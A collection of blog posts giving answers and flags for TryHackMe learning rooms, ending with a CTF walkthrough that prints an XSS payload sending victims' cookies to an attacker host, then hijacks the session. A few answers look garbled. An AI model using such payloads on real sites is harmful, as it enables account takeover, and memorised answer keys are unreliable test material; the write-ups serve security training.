Category: TryHackMe

TryHackMe | Answers for CyberChef: The Basics

Posted on by CyberiumX

Hello Folks,

In this blog, we will cover the concepts as well as the answers for the “CyberChef: The Basics” room which is a part of the “Cyber Security 101” learning path. This room provides an overview of a very important web service called CyberChef used for performing cryptographic operations. After completing this room, you will find yourself comfortable with Encryption, Hashing and Encoding.

You can access the room here.

Task 1 Introduction

CyberChef is a versatile, web-based tool for handling various cyber operations, from simple encodings like Base64 to complex encryptions like AES. It operates through “recipes,” or sequences of tasks applied to data. Key learning includes navigating its interface, understanding operations, and creating data-processing recipes.

Proceed with the next tasks to learn more!

No answer required

Task 2 Accessing the Tool

This task will help us access the CyberChef tool. There are two methods: first, accessing it via a web browser, and second, downloading the stable release, which works on both Linux and Windows Operating Systems.

I have access to CyberChef and I’m ready to dive into it.

No answer required

Task 3 Navigating the Interface

This task will guide us about the interface of CyberChef which has four main sections: Operations, Recipe, Input, and Output. The Operations area offers a wide range of categorized functions, the Recipe area lets users arrange and manage operations, the Input area is for entering data, and the Output area displays processed results with options to save or copy.

Q 3.1- In which area can you find “From Base64”?

A 3.1- Operations

Q 3.2- Which area is considered the heart of the tool?

A 3.2- Recipe

Task 4 Before Anything Else

Using CyberChef involves a four-step process: define a clear objective, input your data, choose relevant operations (like encryption/encoding methods), and review the output to ensure the goal is achieved. If the result isn’t as expected, refine and repeat the steps.

Q 4.1- At which step would you determine, “What do I want to accomplish?

A 4.1- 1

Task 5 Practice, Practice, Practice

This task explores CyberChef’s main operation categories—Extractors, Date/Time, and Data Format. It covers extracting data (like IP addresses, URLs, emails), converting timestamps, and encoding formats (e.g., Base64). A practical exercise lets users apply these operations by analyzing task files.

Q 5.1- What is the hidden email address?

A 5.1- hidden@hotmail.com

Q 5.2- What is the hidden IP address that ends in .232?

A 5.2- 102.20.11.232

Q 5.3- Which domain address starts with the letter “T”?

A 5.3- TryHackMe.com

Q 5.4- What is the binary value of the decimal number 78?

A 5.4- 01001110

Q 5.5- What is the URL encoded value of https://tryhackme.com/r/careers?

A 5.5- https://tryhackme.com/r/careers

Task 6 Your First Official Cook

In this task, we have to practically apply whatever we have learned in this room to get a deeper understanding of all the concepts.

Q 6.1- Using the file you downloaded in Task 5, which IP starts and ends with “10”?

A 6.1- 10.10.2.101

Q 6.2- What is the base64 encoded value of the string “Nice Room!”?

A 6.2- TmljZSBSb29tIQ==

Q 6.3- What is the URL decoded value for https%3A%2F%2Ftryhackme%2Ecom%2Fr%2Froom%2Fcyberchefbasics?

A 6.3- https://tryhackme.com/r/room/cyberchefbasics

Q 6.4- What is the datetime string for the Unix timestamp 1725151258?

A 6.4- Sun 1 September 2024 00:40:58 UTC

Q 6.5- What is the Base85 decoded string of the value <+oue+DGm>Ap%u7?

A 6.5- This is fun!

Task 7 Conclusion

I will have CyberChef, the Swiss Army knife of cyber security, ready for my upcoming journeys!

No answer required

You can check out our other blogs here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe | Answers for Training Impact on Teams

Posted on by CyberiumX

Hello Folks,

In this blog, we will cover the importance as well as the answers for the “Training Impact on Teams” room which is a part of the “Cyber Security 101” learning path. This room provides an understanding of how cyber security training is important for organizations. We will learn some unique concepts about the procedure and the impact of it in ensuring security.

You can access the room here.

Task 1 Understanding the Impact of Cyber Security Training

Mastering cybersecurity requires practice in safe environments, like training labs, to build skills without risking live systems. Training not only enhances individual and team readiness but also aligns skill levels within organizations, fostering collaboration, faster learning, and better incident response.

Q 1.1- What is the most efficient way to ramp up the skills of a junior hire in cyber security?

A 1.1- Training

Task 2 Cyber Security Training for Large Organisations

Off-the-shelf training is ideal for small teams, but larger teams or those with specific needs benefit from customizable options like TryHackMe’s Content Studio. Large corporations often seek integrated solutions with features like SSO and APIs to seamlessly incorporate training into existing systems.

Q 2.1- What is the name of the dashboard that TryHackMe offers for companies to create customised training paths?

 A 2.1- Content Studio

Task 3 Write a Cyber Security Training Investment Proposal

Companies can see significant ROI from training investments, as shown in a case where a cybersecurity team of 10 improves productivity by 4%, yielding $32,000 in savings versus a $5,000 training cost, resulting in a 640% ROI. Proposals detailing these benefits, like the one from TryHackMe, can help secure training budgets.

Q 3.1- What would be the savings due to the increased productivity?

A 3.1- 40000

Q 3.2- Assuming that training costs $500 per employee, what is the Return on Investment?

A 3.2- 400%

Task 4 Vendor Selection

When selecting a training vendor, consider questions such as the training’s target audience, content relevance, vendor experience, platform capabilities, and cost-benefit alignment. Addressing these helps ensure the training aligns with organizational needs and optimizes team productivity.

Remember to consider the above questions as you work to select the training provider.

No answer required

Task 5 Conclusion

Training is crucial for a cybersecurity team’s effectiveness and benefits both employees and employers, as many embrace lifelong learning.

Let’s continue investing in our knowledge and skills.

No answer required

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for SOC Fundamentals

Posted on by CyberiumX

Hello Folks,

In this blog, we will cover the concepts as well as the answers for the “SOC Fundamentals” room which is a part of the “Cyber Security 101” learning path. It will cover the fundamentals of Security Operations Center (SOC), including the purpose and components of it. In the end we’ll have a practical exercise, after completing which, we will find ourselves familiar with the operations performed in SOC.

You can access the room by clicking here.

Task 1 Introduction to SOC

This task introduces us with the basic concept of SOC which protects critical data from cyber threats. A Security Operations Center (SOC) is a 24/7 dedicated team that monitors networks to detect and respond to malicious activity protecting company’s assets.

Q 1.1- What does the term SOC stand for?

A 1.1- Security Operations Center 

Task 2 Purpose and Components

In this section, we will dive deep into the purpose and components of SOC. The primary focus of SOC is Detection and Response. The effective SOC operations rely on people, process and technology which altogether creates an efficient environment for detection and response.

Q 2.1- The SOC team discovers an unauthorized user is trying to log in to an account. Which capability of SOC is this?

A 2.1- Detection

Q 2.2- What are the three pillars of a SOC?

A 2.2- People, Process, Technology

Task 3 People

Despite automation, skilled People in a SOC are essential for filtering out false alerts and identifying real threats. The SOC team includes roles like Level 1-3 Analysts for escalating threat detection, security and detection engineers for deploying and managing security solutions, and a SOC Manager who oversees processes and reports to the CISO on security posture.

Q 3.1- Alert triage and reporting is the responsibility of?

A 3.1- SOC Analyst (Level 1)

Q 3.2- Which role in the SOC team allows you to work dedicatedly on establishing rules for alerting security solutions?

A 3.2- Detection Engineer

Task 4 Process

SOC processes involve alert triage, where analysts assess alerts using the “5 Ws” (What, When, Where, Who, Why) to prioritize threats, and reporting, where critical findings are escalated as detailed tickets. For severe threats, the team conducts incident response and forensics to analyze and contain malicious activities, identifying root causes.

Q 4.1- At the end of the investigation, the SOC team found that John had attempted to steal the system’s data. Which ‘W’ from the 5 Ws does this answer?

A 4.1- Who

Q 4.2- The SOC team detected a large amount of data exfiltration. Which ‘W’ from the 5 Ws does this answer?

A 4.2- What

Task 5 Technology

In a SOC, technology encompasses security solutions that centralize threat detection and response, minimizing manual effort. Key tools include SIEM for log-based threat detection, EDR for endpoint visibility and response, and firewalls for network traffic filtering. These technologies, along with others like IDS/IPS and SOAR, are chosen based on organizational needs and resources to effectively safeguard the network.

Q 5.1- Which security solution monitors the incoming and outgoing traffic of the network?

A 5.1- Firewall

Q 5.2- Do SIEM solutions primarily focus on detecting and alerting about security incidents? (yea/nay)

A 5.2- yea

Task 6 Practical Exercise of SOC

In this section, a practical task is given to practice the things we have learnt in this room.

Q 6.1- What: Activity that triggered the alert?

A 6.1- Port Scan

Q 6.2- When: Time of the activity? 

A 6.2- June 12, 2024 17:24

Q 6.3- Where: Destination host IP? 

A 6.3- 10.0.0.3

Q 6.4- Who: Source host name?

A 6.4- Nessus

Q 6.5- Why: Reason for the activity? Intended/Malicious

A 6.5- Intended

Q 6.6- Additional Investigation Notes: Has any response been sent back to the port scanner IP? (yea/nay)

A 6.6- Yea

Q 6.7- What is the flag found after closing the alert?

A 6.7- THM{000_INTRO_TO_SOC}

Task 7 Conclusion

I understand the fundamentals of a SOC.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for Web Application Basics

Posted on by CyberiumX

Hello Folks,
In this blog, we will cover the concepts as well as the answers for the “Web Application Basics” room which is a part of the “Cyber Security 101” learning path. It will cover web application fundamentals, including some key topics such as, URLs, HTTP requests/response headers, methods and status codes. After completing this blog, you will find yourself familiar with how web applications work.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives for understanding the basics of web application architecture.

I am ready to learn about Web Applications!

No answer needed

Task 2 Web Application Overview

In this task, the overview of a web app is given compared to a planet where Front End represents the surface which is visible to everyone using programming languages like HTML, CSS and JavaScript. The Back End is similar to the planet’s hidden surface including infrastructure, database and security systems like Web Application Firewalls (WAF).

Q 2.1- Which component on a computer is responsible for hosting and delivering content for web applications?

A 2.1- Web Server

Q 2.2- Which tool is used to access and interact with web applications?

A 2.2- Web Browser

Q 2.3- Which component acts as a protective layer, filtering incoming traffic to block malicious attacks, and ensuring the security of the web application?

A 2.3- Web Application Firewall

Task 3 Uniform Resource Locator

This task will focus on one of the important component through which a user accesses a web application; a URL sometimes called a web address. It has various components such as Scheme (HTTP/HTTPS), User which consists of login details, Host/Domain which identifies the website, Path (resource location or web page), Query String (input for searches), Fragments (for accessing specific section on a web page).

Q 3.1- Which protocol provides encrypted communication to ensure secure data transmission between a web browser and a web server?

A 3.1- HTTPS

Q 3.2- What term describes the practice of registering domain names that are misspelt variations of popular websites to exploit user errors and potentially engage in fraudulent activities?

A 3.2- Typosquatting

Q 3.3- What part of a URL is used to pass additional information, such as search terms or form inputs, to the web server?

A 3.3- Query String

Task 4 HTTP Messages

This section will dive deep into the concepts of HTTP messages which are exchanged between a client browser and a web server including requests coming from the user and response coming from the server. These messages contains start line, headers, empty line and body. Understanding these components is crucial for web application communication.

Q 4.1- Which HTTP message is returned by the web server after processing a client’s request?

A 4.1- HTTP Response

Q 4.2- What follows the headers in an HTTP message?

A 4.2- Empty Line

Task 5 HTTP Request: Request Line and Methods

This section will help us understand an HTTP request, which is sent by a user to a web server and includes a request line (method, path, version), various HTTP methods (GET, POST, etc.), and a URL path that directs the server to the desired resource. Each method has unique security implications, and newer HTTP versions (like HTTP/2 and HTTP/3) enhance speed and security, though many systems still use HTTP/1.1.

Q 5.1- Which HTTP protocol version became widely adopted and remains the most commonly used version for web communication, known for introducing features like persistent connections and chunked transfer encoding?

A 5.1- HTTP/1.1

Q 5.2- Which HTTP request method describes the communication options for the target resource, allowing clients to determine which HTTP methods are supported by the web server?

A 5.2- OPTIONS

Q 5.3- In an HTTP request, which component specifies the specific resource or endpoint on the web server that the client is requesting, typically appearing after the domain name in the URL?

A 5.3- URL Path

Task 6 HTTP Request: Headers and Body

This task will provide an introduction to common HTTP request headers and body. Request headers provide additional details to the server, such as the host, user-agent, and content type. The request body, present in POST/PUT requests, contains data in formats like URL-encoded, form data, JSON, or XML—each suited for different data structures and types.

Q 6.1- Which HTTP request header specifies the domain name of the web server to which the request is being sent?

A 6.1- Host

Q 6.2- What is the default content type for form submissions in an HTTP request where the data is encoded as key=value pairs in a query string format?

A 6.2- application/x-www-form-urlencoded

Q 6.3- Which part of an HTTP request contains additional information like host, user agent, and content type, guiding how the web server should process the request?

A 6.3- Request Headers

Task 7 HTTP Response: Status Line and Status Codes

This section covers the concepts of HTTP Responses which include a status code and reason phrase to indicate the outcome of a request. These codes fall into categories like informational (100-199), successful (200-299), redirection (300-399), client errors (400-499), and server errors (500-599). Common examples are 200 (OK), 404 (Not Found), and 500 (Internal Server Error).

Q 7.1- What part of an HTTP response provides the HTTP version, status code, and a brief explanation of the response’s outcome?

A 7.1- Status Line

Q 7.2- Which category of HTTP response codes indicates that the web server encountered an internal issue or is unable to fulfil the client’s request?

A 7.2- Server Error Responses

Q 7.3- Which HTTP status code indicates that the requested resource could not be found on the web server?

A 7.3- 404

Task 8 HTTP Response: Headers and Body

HTTP response headers are key-value pairs that provide important details to the client, such as content type, server info, and caching instructions. Essential headers include Date, Content-Type, and Server, while others like Set-Cookie, Cache-Control, and Location offer additional functionality, like managing cookies and caching.

Q 8.1- Which HTTP response header can reveal information about the web server’s software and version, potentially exposing it to security risks if not removed?

A 8.1- Server

Q 8.2- Which flag should be added to cookies in the Set-Cookie HTTP response header to ensure they are only transmitted over HTTPS, protecting them from being exposed during unencrypted transmissions?

A 8.2- Secure

Q 8.3- Which flag should be added to cookies in the Set-Cookie HTTP response header to prevent them from being accessed via JavaScript, thereby enhancing security against XSS attacks?

A 8.3- HttpOnly

Task 9 Security Headers

HTTP Security Headers enhance web application security by mitigating risks like Cross-Site Scripting (XSS) and clickjacking. Key headers include Content-Security-Policy (CSP), which defines safe content sources; Strict-Transport-Security (HSTS), which enforces HTTPS connections; X-Content-Type-Options, which prevents MIME type sniffing; and Referrer-Policy, which controls referrer information shared during redirection. These headers work together to strengthen web security.

Q 9.1- In a Content Security Policy (CSP) configuration, which property can be set to define where scripts can be loaded from?

A 9.1- script-src

Q 9.2- When configuring the Strict-Transport-Security (HSTS) header to ensure that all subdomains of a site also use HTTPS, which directive should be included to apply the security policy to both the main domain and its subdomains?

A 9.2- includeSubDomains

Q 9.3- Which HTTP header directive is used to prevent browsers from interpreting files as a different MIME type than what is specified by the server, thereby mitigating content type sniffing attacks?

A 9.3- nosniff

Task 10 Practical Task: Making HTTP Requests

In this section, a practical task is given to practice the things we have learnt in this room.

Q 10.1- Make a GET request to /api/users. What is the flag?

A 10.1- THM{YOU_HAVE_JUST_FOUND_THE_USER_LIST}

Q 10.2- Make a POST request to /api/user/2 and update the country of Bob from UK to US. What is the flag?

A 10.2- THM{YOU_HAVE_MODIFIED_THE_USER_DATA}

Q 10.3- Make a DELETE request to /api/user/1 to delete the user. What is the flag?

A 10.3- THM{YOU_HAVE_JUST_DELETED_A_USER}

Task 11 Conclusion

I’m ready to move forward and learn more about web application security.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for Moniker Link (CVE-2024-21413)

Posted on by CyberiumX

Hello Folks,
In this introductory blog, we will cover the answers for the “Moniker Link (CVE-2024-21413)” room which is a part of the “Cyber Security 101” learning path. This room covers a critical Remote Code Execution (RCE) and credential leak vulnerability in Microsoft Outlook. This vulnerability allows attackers to exploit malicious Moniker Links in emails, leaking NTLM credentials from affected Office versions.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites for understanding the CVE-2024-21413 vulnerability

Q 1.1- What “Severity” rating has the CVE been assigned?

A 1.1- Critical

Task 2 Moniker Link (CVE-2024-21413)

In this task, we will understand the overview of CVE-2024-21413 in which attackers exploited Moniker links by modifying them with special characters to bypass Outlook’s Protected View security feature.

Q 2.1- What Moniker Link type do we use in the hyperlink?

A 2.1- file://

Q 2.2- What is the special character used to bypass Outlook’s “Protected View”?

A 2.2- !

Task 3 Exploitation

Here, we will dive deep into the exploitation part of this vulnerability where an intruder can craft an email containing the Moniker Link designed to bypass the outlook’s security feature and capture the netNTLMv2 hash of the user who clicks on it. Adversaries in this scenario can use Responder for capturing the hashes.

Q 3.1- What is the name of the application that we use on the AttackBox to capture the user’s hash?

A 3.1- Responder

Q 3.2- What type of hash is captured once the hyperlink in the email has been clicked?

A 3.2- netNTLMV2

Task 4 Detection

Now to detect this vulnerability a YARA rule was created which identifies the “file:\” element in Moniker Links. Also, capturing packets via sniffing can reveal SMB requests from victims containing truncated netNTLMv2 hashes.

Click me to proceed onto the next task!

No answer needed

Task 5 Remediation

This section discusses the mitigation steps immediately taken by Microsoft in February’s “Patch Tuesday” and users were also advised to avoid clicking on unsolicited links before previewing it.

Click me to proceed onto the next task.

No answer needed

Task 6 Conclusion

Mischief managed.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Cryptography Basics

Posted on by CyberiumX

Hello Folks,

In this introductory blog, we will cover the answers for the “Cryptography Basics” room which is a part of the “Cyber Security 101” learning path.  This room covers the basics of cryptography which secures the digital communication maintaining confidentiality, integrity and authenticity of the data. We will cover many concepts related to it such as symmetric & asymmetric cryptography, encoding and basic math behind these ciphers. 

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room. You can work on it to understand the concepts of Cryptography.

I’m ready to start learning about cryptography!

No answer needed

Task 2 Importance of Cryptography

Cryptography has become vital for every online transaction and communication as it secures our data privacy from intruders. In this section, we will understand the importance of it. 

Q 2.1- What is the standard required for handling credit card information?

A 2.1- PCI DSS

Task 3 Plaintext to Ciphertext

In this task, we will explore the concepts of Plaintext which is considered as human readable and understandable form of data and Ciphertext which is non-human readable form of data. Key terms include plaintext, ciphertext, encryption and decryption.

Q 3.1- What do you call the encrypted plaintext?

A 3.1- Ciphertext

Q 3.2- What do you call the process that returns the plaintext?

A 3.2- decryption

Task 4 Historical Ciphers

This task presents the history of cryptography where one of the oldest algorithms called Caesar Cipher was built and used. This cipher is considered weak as per today’s world but now we have other ciphers to use such as Base64, Morse Code, etc.

Q 4.1- Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?

A 4.1- ICANENCRYPT

Task 5 Types of Encryption

In this section, we will cover two types of encryption: symmetric encryption where a shared key is used for both encryption and decryption and asymmetric encryption where two different but relational keys are used; one for encryption and other one for decryption.

Q 5.1- Should you trust DES? (Yea/Nay)

A 5.1- Nay

Q 5.2- When was AES adopted as an encryption standard?

A 5.2- 2001

Task 6 Basic Math

The two fundamental mathematical operations on which most cryptographic ciphers are based are XOR and modulo operation. We can understand the concepts of it by going through this task.

Q 6.1- What’s 1001 ⊕ 1010?

A 6.1- 0011

Q 6.2- What’s 118613842%9091?

A 6.2- 3565

Q 6.3- What’s 60%12?

A 6.3- 0

Task 7 Summary

Before proceeding to the next room, make sure you have taken note of all the key terms and concepts introduced in this room.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Networking Concepts

Posted on by CyberiumX

Hello Folks,

In this introductory blog, we will cover the answers for the “Networking Concepts” room which is a part of the “Cyber Security 101” learning path.  This room covers the basics of networking, including the concepts of the OSI model, TCP/IP model, IP addresses, subnets, routing, and TCP/UDP. This knowledge will help us understand the backbone of computer networks.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room. You can work on it to understand the networking concepts.

Get your notepad ready, and let’s begin.

No Answer Needed

Task 2 OSI Model

This task covers one of the most vital concepts of networking which is OSI Model. It is a 7 layer framework governing the network communication. Read the concepts of it and then we can easily answer the following questions.

Q 2.1- Which layer is responsible for connecting one application to another?

A 2.1- Layer 4

Q 2.2- Which layer is responsible for routing packets to the proper network?

A 2.2- Layer 3

Q 2.3- In the OSI model, which layer is responsible for encoding the application data?

A 2.3- Layer 6

Q 2.4- Which layer is responsible for transferring data between hosts on the same network segment?

A 2.4- Layer 2

Task 3 TCP/IP Model

The TCP/IP model is another real-time communication model that helps individuals to understand network communication. It is the simplified form of the OSI model. Go through the concepts of this and then work on the following questions.

Q 3.1- To which layer does HTTP belong in the TCP/IP model?

A 3.1- Application Layer

Q 3.2- How many layers of the OSI model does the application layer in the TCP/IP model cover?

A 3.2- 3

Task 4 IP Addresses and Subnets

This task will provide us with the in depth knowledge of IP addresses which helps in uniquely identifying every device present on a network. We will explore different types of IP addresses and a very important technique called Network Address Translation (NAT).

Q 4.1- Which of the following IP addresses is not a private IP address?

a) 192.168.250.125

b) 10.20.141.132

c) 49.69.147.197

d) 172.23.182.251

A 4.1- 49.69.147.197

Q 4.2- Which of the following IP addresses is not a valid IP address?

a) 192.168.250.15

b) 192.168.254.17

c) 192.168.305.19

d) 192.168.199.13

A 4.2- 192.168.305.19

Task 5 UDP and TCP

In this task, we will explore the two most important transport layer protocols which are essential for providing end-to-end connectivity. These protocols are Transmission Control Protocol (TCP) which is used for reliable communication and User Datagram Protocol (UDP) which is used for fast data transmission. 

Q 5.1- Which protocol requires a three-way handshake?

A 5.1- TCP

Q 5.2- What is the approximate number of port numbers (in thousands)?

A 5.2- 65

Task 6 Encapsulation

Here, we are going to explore the concepts of encapsulation which is a process of concatenating the header and trailer in each layer to the data received from the previous layer. After reading the content, you can answer the following questions.

Q 6.1- On a WiFi, within what will an IP packet be encapsulated?

A 6.1- Frame

Q 6.2- What do you call the UDP data unit that encapsulates the application data?

A 6.2- Datagram

Q 6.3- What do you call the data unit that encapsulates the application data sent over TCP?

A 6.3- Segment

Task 7 Telnet

Telnet is another useful protocol that allows us to connect to the remote open ports and run text commands which can be useful for accessing services like HTTP, SMTP, echo, etc. This can help us gather information about the service versions of protocols running on the target machine.

Q 7.1- Use telnet to connect to the web server on MACHINE_IP. What is the name and version of the HTTP server?

A 7.1- lighttpd/1.4.63

Q 7.2- What flag did you get when you viewed the page?

A 7.2- THM{TELNET_MASTER}

Task 8 Conclusion

Please note and remember all the concepts, network layers, and protocols explained in this room.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Windows Command Line

Posted on by CyberiumX

Hello Folks,
In this write-up, we will discuss the answers for the “Windows Command Line” room which is a segment of the “Cyber Security 101” learning path. This blog covers the concepts of using Windows with the CLI interface for doing your day-to-day tasks such as file management, system information, monitoring processes, etc. Harnessing the power of CLI offers speed, efficiency, and advantages like automation and remote management.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites required for the Command line interface of Windows which is essential in cyber security.

Q 1.1- What is the default command line interpreter in the Windows environment?

A 1.1- cmd.exe

Task 2 Basic System Information

This task will guide us in learning some basic but important commands like set, ver, systeminfo, more, cls, and some CLI-based operators. Using these commands we can get the information about our system.

Q 2.1- What is the OS version of the Windows VM?

A 2.1- 10.0.20348.2655

Q 2.2- What is the hostname of the Windows VM?

A 2.2- WINSRV2022-CORE

Task 3 Network Troubleshooting

CLI interface of Windows using command prompt provides various vital utilities for network configurations and troubleshooting such as ipconfig, ipconfig /all, ping, tracert, nslookup, and netstat. Each of these tools can help us perform tasks related to networking.

Q 3.1- Which command can we use to look up the server’s physical address (MAC address)?

A 3.1- ipconfig /all

Q 3.2- What is the name of the process listening on port 3389?

A 3.2- TermService

Q 3.3- What is the IP address of your gateway?

A 3.3- 10.10.0.1

Task 4 File and Disk Management

For managing the file system of Windows OS, the CLI interface offers multiple commands such as cd, dir, mkdir, rmdir, tree, copy, move, type, and erase for traversing and managing files and directories. We can also use the power of wildcards like * which will help handle multiple files and directories at once.

Q 4.1- What are the file’s contents in C:\Treasure\Hunt?

A 4.1- THM{CLI_POWER}

Task 5 Task and Process Management

For managing tasks and running processes in Windows Command Prompt, we have an important utility called tasklist which has the capability of listing and filtering various processes running on the machine. We can also terminate the running processes with taskkill command.

Q 5.1- What command would you use to find the running processes related to notepad.exe?

A 5.1- tasklist /FI “imagename eq notepad.exe”

Q 5.2- What command can you use to kill the process with PID 1516?

A 5.2- taskkill /PID 1516

Task 6 Conclusion

Q 6.1- The command shutdown /s can shut down a system. What is the command you can use to restart a system?

A 6.1- shutdown /r

Q 6.2- What command can you use to abort a scheduled system shutdown?

A 6.2- shutdown /a

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Search Skills

Posted on by CyberiumX

Hello Folks,

In this write-up, we will discuss the answers for the “Search Skills” room which is a segment of the “Cyber Security 101” learning path. This room helps you in building strong search skills to handle information overload, covering source evaluation, efficient search engine use, specialized search tools, technical documentation, social media, and news outlets.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives of effective search skills that are required for this room.

Check how many results you get when searching for learn hacking. At the time of writing, we got 1.5 billion results when searching on Google.

No answer needed

Task 2 Evaluation of Search Results

The internet provides a platform for anyone to share their opinions, from blogs to wiki edits, making it necessary for readers to critically analyze information. Important evaluation aspects include authenticating the source’s reliability, inquiring into the quality of evidence, and verifying details through independent sources.

Q 2.1- What do you call a cryptographic method or product considered bogus or fraudulent?

A 2.1- Snake Oil

Q 2.2- What is the name of the command replacing netstat in Linux systems?

A 2.1- ss

Task 3 Search Engines

Many of us make use of search engines but we don’t take full advantage of its features. By applying operators such as quotes for exact phrases, site: to target specific domains, – to ignore specific terms, and filetype: for file-specific searches, we can simplify results and check out more relevant information on platforms like Google, Bing, or DuckDuckGo.

Q 3.1- How would you limit your Google search to PDF files containing the terms cyber warfare report?

A 3.1- filetype:pdf cyber warfare report

Q 3.2- What phrase does the Linux command ss stand for?

A 3.2- Socket Statistics

Task 4 Specialized Search Engines

Shodan, Censys, VirusTotal, and Have I Been Pwned are dedicated tools used for identifying internet-connected devices, assessing network assets, evaluating files for malware, and verifying data breaches, respectively. Together these tools enhance cybersecurity awareness and lift threat detection capabilities 

Q 4.1- What is the top country with lighttpd servers?

A 4.1- United States

Q 4.2- What does BitDefenderFalx detect the file with the hash 2de70ca737c1f4602517c555ddd54165432cf231ffc0e21fb2e23b9dd14e7fb4 as?

A 4.2- Android.Riskware.Agent.LHH

Task 5 Vulnerabilities and Exploits

The CVE program provides standardized IDs for vulnerabilities, helping users identify specific security issues, while the Exploit Database and GitHub offer verified exploit codes and proof-of-concepts for testing vulnerabilities under authorized conditions.

Q 5.1- What utility does CVE-2024-3094 refer to?

A 5.1- xz

Task 6 Technical Documentation

Looking into the official documentation in the form of Linux man pages,  Microsoft Windows Technical Documentations, and other product-based documents is vital for getting the latest guidelines and configuration commands for various features. This can help in troubleshooting and skill-building.

Q 6.1- What does the Linux command cat stand for?

A 6.1- Concatenate

Q 6.2- What is the netstat parameter in MS Windows that displays the executable associated with each active connection and listening port?

A 6.2- -b

Task 7 Social Media

Social media platforms are important sources of gathering personal information about individuals and organizations. It’s important to note that our information should not be overshared on these platforms for which we should stay updated on cybersecurity trends and threats.

Q 7.1- You are hired to evaluate the security of a particular company. What is a popular social media website you would use to learn about the technical background of one of their employees?

A 7.1- LinkedIn

Q 7.2- Continuing with the previous scenario, you are trying to find the answer to the secret question, “Which school did you go to as a child?”. What social media website would you consider checking to find the answer to such secret questions?

A 7.2- Facebook

Task 8 Conclusion

Ensure you have noted the various search engines and resources mentioned in this room as they will be convenient in any cyber security path you follow.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe- Whats Your Name?

Posted on by CyberiumX

Hello Folks,
In this blog, we are going to solve a challenge that will test our client-side exploitation skills. The name of this challenge is “Whats Your Name?” and it is available on the TryHackMe platform. This CTF is only available to TryHackMe subscribers. We will be exploring some web application vulnerabilities like Cross-site Scripting (XSS), Session Hijacking, and Sensitive data exposure. Let’s start solving the challenge and begin the penetration testing process.
We have to start the machine by clicking on the “Start Machine” button and scan the obtained IP address using the Nmap tool with the help of the following command.

nmap -sS <Machine_IP>

1. Nmap 1

We will find three open ports i.e. 22 (SSH), 80 (HTTP), and 8081 (HTTP). Let’s enumerate HTTP port 80 by adding the domain name on the /etc/hosts file. We can open the browser and visit the website.

Getting Moderator’s Flag

On the webpage, we will find a registration form as we click on the “Register” button. Let’s provide some details here and try to test the parameters for XSS vulnerability. The field which seems vulnerable is “Name”, so we can provide the following payload on this field to steal the cookies of the user who will check our registration details:

<script>document.location=”http://<Kali_IP>:1337/cookie?c=”+document.cookie</script>

2. Regsiteration

On our Kali Linux machine, we have to start a Python web server on the 1337 port using the following command:

python3 -m http.server 1337

We can now submit the registration form to send the malicious XSS payload to the target user. After a few seconds, we will find a request on our Python web server with the cookie value of the victim user.

3. Got cookie

Now, we have to use these cookies to perform a session-hijacking attack on the victim user. We can add these cookies to our browser using the “Inspect” tool. Let’s press “Ctrl+Shift+I” to open the Inspect element and go to the Storage tab (on Firefox browser). There we will find a cookie with the name “PHPSESSID”. If you do not get it then you can add a cookie with this name and paste the cookie value received from the victim user. After adding the value, we have to reload the page so that we send this cookie to the server and impersonate the victim user. After reloading the page, we will find that we are logged in as Moderator user and we have our first flag.

4. moderator flag

Getting Admin’s Flag

Now we have to find the admin flag. Let’s go back to the browser and we will find a new domain name where we can log in with these credentials after verifying the account. Let’s add the new domain name to our /etc/hosts file and start enumerating the directories using the Gobuster tool. We can use the following command for the same:

gobuster dir -u http://login.worldwap.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,py,txt,html

After running the above command, we will find some web pages. The “admin.py” webpage contains the credentials of the admin user which we have to try. There is another page “login.php” which has a login page. Let’s try these credentials of the admin user on the login.php page. We will find that we are successfully logged in as admin user. We can find that admin flag on the dashboard which we can submit to solve this challenge.

5. Admin flag

Overall, this challenge was very easy for those with good knowledge of client-side vulnerabilities. Others must have gained a lot of knowledge of these vulnerabilities.
You can explore the walkthrough for TryHackMe’s CTF on our website and start learning about penetration testing.

Happy Pentesting!
Team CyberiumX